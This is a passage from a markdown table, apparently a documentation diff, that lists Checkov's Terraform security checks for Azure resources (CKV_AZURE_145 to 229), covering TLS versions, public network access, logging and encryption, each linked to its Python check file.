[FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1398 | CKV_AZURE_145 | resource | azurerm_linux_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1399 | CKV_AZURE_145 | resource | azurerm_linux_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1400 | CKV_AZURE_145 | resource | azurerm_windows_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1401 | CKV_AZURE_145 | resource | azurerm_windows_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) | +| 1402 | CKV_AZURE_146 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py) | +| 1403 | CKV_AZURE_147 | resource | azurerm_postgresql_server | Ensure PostgreSQL is using the latest version of TLS encryption | Terraform | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py) | +| 1404 | CKV_AZURE_148 | resource | azurerm_redis_cache | Ensure Redis Cache is using the latest version of TLS encryption | Terraform | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py) | +| 1405 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | +| 1406 | CKV_AZURE_149 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine does not enable password authentication | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py) | +| 1407 | CKV_AZURE_150 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0 | Terraform | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py) | +| 1408 | CKV_AZURE_151 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables encryption | Terraform | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py) | +| 1409 | CKV_AZURE_152 | resource | azurerm_api_management | Ensure Client Certificates are enforced for API management | Terraform | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py) | +| 1410 | CKV_AZURE_153 | resource | azurerm_app_service_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1411 | CKV_AZURE_153 | resource | azurerm_linux_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1412 | CKV_AZURE_153 | resource | azurerm_windows_web_app_slot | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py) | +| 1413 | CKV_AZURE_154 | resource | azurerm_app_service_slot | Ensure the App service slot is using the latest version of TLS encryption | Terraform | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py) | +| 1414 | CKV_AZURE_155 | resource | azurerm_app_service_slot | Ensure debugging is disabled for the App service slot | Terraform | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py) | +| 1415 | CKV_AZURE_156 | resource | azurerm_mssql_database_extended_auditing_policy | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs | Terraform | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py) | +| 1416 | CKV_AZURE_157 | resource | azurerm_synapse_workspace | Ensure that Synapse workspace has data_exfiltration_protection_enabled | Terraform | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py) | +| 1417 | CKV_AZURE_158 | resource | azurerm_databricks_workspace | Ensure Databricks Workspace data plane to control plane communication happens over private link | Terraform | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py) | +| 1418 | CKV_AZURE_159 | resource | azurerm_function_app | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | +| 1419 | CKV_AZURE_159 | resource | azurerm_function_app_slot | Ensure function app builtin logging is enabled | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py) | +| 1420 | CKV_AZURE_160 | resource | azurerm_network_security_group | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | +| 1421 | CKV_AZURE_160 | resource | azurerm_network_security_rule | Ensure that HTTP (port 80) access is restricted from the internet | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py) | +| 1422 | CKV_AZURE_161 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal is enabled on for HTTPS | Terraform | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py) | +| 1423 | CKV_AZURE_162 | resource | azurerm_spring_cloud_api_portal | Ensures Spring Cloud API Portal Public Access Is Disabled | Terraform | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py) | +| 1424 | CKV_AZURE_163 | resource | azurerm_container_registry | Enable vulnerability scanning for container images. | Terraform | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py) | +| 1425 | CKV_AZURE_164 | resource | azurerm_container_registry | Ensures that ACR uses signed/trusted images | Terraform | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py) | +| 1426 | CKV_AZURE_165 | resource | azurerm_container_registry | Ensure geo-replicated container registries to match multi-region container deployments. | Terraform | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py) | +| 1427 | CKV_AZURE_166 | resource | azurerm_container_registry | Ensure container image quarantine, scan, and mark images verified | Terraform | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py) | +| 1428 | CKV_AZURE_167 | resource | azurerm_container_registry | Ensure a retention policy is set to cleanup untagged manifests. | Terraform | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py) | +| 1429 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | +| 1430 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster_node_pool | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) | +| 1431 | CKV_AZURE_169 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | Terraform | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py) | +| 1432 | CKV_AZURE_170 | resource | azurerm_kubernetes_cluster | Ensure that AKS use the Paid Sku for its SLA | Terraform | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py) | +| 1433 | CKV_AZURE_171 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster upgrade channel is chosen | Terraform | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py) | +| 1434 | CKV_AZURE_172 | resource | azurerm_kubernetes_cluster | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | Terraform | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py) | +| 1435 | CKV_AZURE_173 | resource | azurerm_api_management | Ensure API management uses at least TLS 1.2 | Terraform | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py) | +| 1436 | CKV_AZURE_174 | resource | azurerm_api_management | Ensure API management public access is disabled | Terraform | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py) | +| 1437 | CKV_AZURE_175 | resource | azurerm_web_pubsub | Ensure Web PubSub uses a SKU with an SLA | Terraform | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py) | +| 1438 | CKV_AZURE_176 | resource | azurerm_web_pubsub | Ensure Web PubSub uses managed identities to access Azure resources | Terraform | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py) | +| 1439 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | +| 1440 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine_scale_set | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) | +| 1441 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | +| 1442 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine_scale_set | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) | +| 1443 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1444 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1445 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1446 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) | +| 1447 | CKV_AZURE_180 | resource | azurerm_kusto_cluster | Ensure that data explorer uses Sku with an SLA | Terraform | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py) | +| 1448 | CKV_AZURE_181 | resource | azurerm_kusto_cluster | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely. | Terraform | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py) | +| 1449 | CKV_AZURE_182 | resource | azurerm_virtual_network | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | +| 1450 | CKV_AZURE_182 | resource | azurerm_virtual_network_dns_servers | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) | +| 1451 | CKV_AZURE_183 | resource | azurerm_virtual_network | Ensure that VNET uses local DNS addresses | Terraform | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py) | +| 1452 | CKV_AZURE_184 | resource | azurerm_app_configuration | Ensure 'local_auth_enabled' is set to 'False' | Terraform | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py) | +| 1453 | CKV_AZURE_185 | resource | azurerm_app_configuration | Ensure 'Public Access' is not Enabled for App configuration | Terraform | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py) | +| 1454 | CKV_AZURE_186 | resource | azurerm_app_configuration | Ensure App configuration encryption block is set. | Terraform | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py) | +| 1455 | CKV_AZURE_187 | resource | azurerm_app_configuration | Ensure App configuration purge protection is enabled | Terraform | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py) | +| 1456 | CKV_AZURE_188 | resource | azurerm_app_configuration | Ensure App configuration Sku is standard | Terraform | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py) | +| 1457 | CKV_AZURE_189 | resource | azurerm_key_vault | Ensure that Azure Key Vault disables public network access | Terraform | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py) | +| 1458 | CKV_AZURE_190 | resource | azurerm_storage_account | Ensure that Storage blobs restrict public access | Terraform | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py) | +| 1459 | CKV_AZURE_191 | resource | azurerm_eventgrid_topic | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | Terraform | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py) | +| 1460 | CKV_AZURE_192 | resource | azurerm_eventgrid_topic | Ensure that Azure Event Grid Topic local Authentication is disabled | Terraform | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py) | +| 1461 | CKV_AZURE_193 | resource | azurerm_eventgrid_topic | Ensure public network access is disabled for Azure Event Grid Topic | Terraform | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py) | +| 1462 | CKV_AZURE_194 | resource | azurerm_eventgrid_domain | Ensure that Managed identity provider is enabled for Azure Event Grid Domain | Terraform | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py) | +| 1463 | CKV_AZURE_195 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain local Authentication is disabled | Terraform | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py) | +| 1464 | CKV_AZURE_196 | resource | azurerm_signalr_service | Ensure that SignalR uses a Paid Sku for its SLA | Terraform | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py) | +| 1465 | CKV_AZURE_197 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN disables the HTTP endpoint | Terraform | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py) | +| 1466 | CKV_AZURE_198 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN enables the HTTPS endpoint | Terraform | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py) | +| 1467 | CKV_AZURE_199 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses double encryption | Terraform | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py) | +| 1468 | CKV_AZURE_200 | resource | azurerm_cdn_endpoint_custom_domain | Ensure the Azure CDN endpoint is using the latest version of TLS encryption | Terraform | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py) | +| 1469 | CKV_AZURE_201 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses a customer-managed key to encrypt data | Terraform | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py) | +| 1470 | CKV_AZURE_202 | resource | azurerm_servicebus_namespace | Ensure that Managed identity provider is enabled for Azure Service Bus | Terraform | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py) | +| 1471 | CKV_AZURE_203 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus Local Authentication is disabled | Terraform | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py) | +| 1472 | CKV_AZURE_204 | resource | azurerm_servicebus_namespace | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus | Terraform | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py) | +| 1473 | CKV_AZURE_205 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus is using the latest version of TLS encryption | Terraform | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py) | +| 1474 | CKV_AZURE_206 | resource | azurerm_storage_account | Ensure that Storage Accounts use replication | Terraform | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py) | +| 1475 | CKV_AZURE_207 | resource | azurerm_search_service | Ensure Azure Cognitive Search service uses managed identities to access Azure resources | Terraform | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py) | +| 1476 | CKV_AZURE_208 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for index updates | Terraform | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py) | +| 1477 | CKV_AZURE_209 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for search index queries | Terraform | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py) | +| 1478 | CKV_AZURE_210 | resource | azurerm_search_service | Ensure Azure Cognitive Search service allowed IPS does not give public Access | Terraform | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py) | +| 1479 | CKV_AZURE_211 | resource | azurerm_service_plan | Ensure App Service plan suitable for production use | Terraform | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py) | +| 1480 | CKV_AZURE_212 | resource | azurerm_service_plan | Ensure App Service has a minimum number of instances for failover | Terraform | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py) | +| 1481 | CKV_AZURE_213 | resource | azurerm_app_service | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 1482 | CKV_AZURE_213 | resource | azurerm_linux_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 1483 | CKV_AZURE_213 | resource | azurerm_windows_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) | +| 1484 | CKV_AZURE_214 | resource | azurerm_linux_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | +| 1485 | CKV_AZURE_214 | resource | azurerm_windows_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) | +| 1486 | CKV_AZURE_215 | resource | azurerm_api_management_backend | Ensure API management backend uses https | Terraform | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py) | +| 1487 | CKV_AZURE_216 | resource | azurerm_firewall | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Terraform | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py) | +| 1488 | CKV_AZURE_217 | resource | azurerm_application_gateway | Ensure Azure Application gateways listener that allow connection requests over HTTP | Terraform | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py) | +| 1489 | CKV_AZURE_218 | resource | azurerm_application_gateway | Ensure Application Gateway defines secure protocols for in transit communication | Terraform | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py) | +| 1490 | CKV_AZURE_219 | resource | azurerm_firewall | Ensure Firewall defines a firewall policy | Terraform | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py) | +| 1491 | CKV_AZURE_220 | resource | azurerm_firewall_policy | Ensure Firewall policy has IDPS mode as deny | Terraform | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py) | +| 1492 | CKV_AZURE_221 | resource | azurerm_linux_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 1493 | CKV_AZURE_221 | resource | azurerm_linux_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 1494 | CKV_AZURE_221 | resource | azurerm_windows_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 1495 | CKV_AZURE_221 | resource | azurerm_windows_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) | +| 1496 | CKV_AZURE_222 | resource | azurerm_linux_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | +| 1497 | CKV_AZURE_222 | resource | azurerm_windows_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) | +| 1498 | CKV_AZURE_223 | resource | azurerm_eventhub_namespace | Ensure Event Hub Namespace uses at least TLS 1.2 | Terraform | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py) | +| 1499 | CKV_AZURE_224 | resource | azurerm_mssql_database | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity | Terraform | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py) | +| 1500 | CKV_AZURE_225 | resource | azurerm_service_plan | Ensure the App Service Plan is zone redundant | Terraform | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py) | +| 1501 | CKV_AZURE_226 | resource | azurerm_kubernetes_cluster | Ensure ephemeral disks are used for OS disks | Terraform | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py) | +| 1502 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | +| 1503 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster_node_pool | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) | +| 1504 | CKV_AZURE_228 | resource | azurerm_eventhub_namespace | Ensure the Azure Event Hub Namespace is zone redundant | Terraform | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py) | +| 1505 | CKV_AZURE_229 | resource | azurerm_mssql_database | Ensure the Azure SQL Database 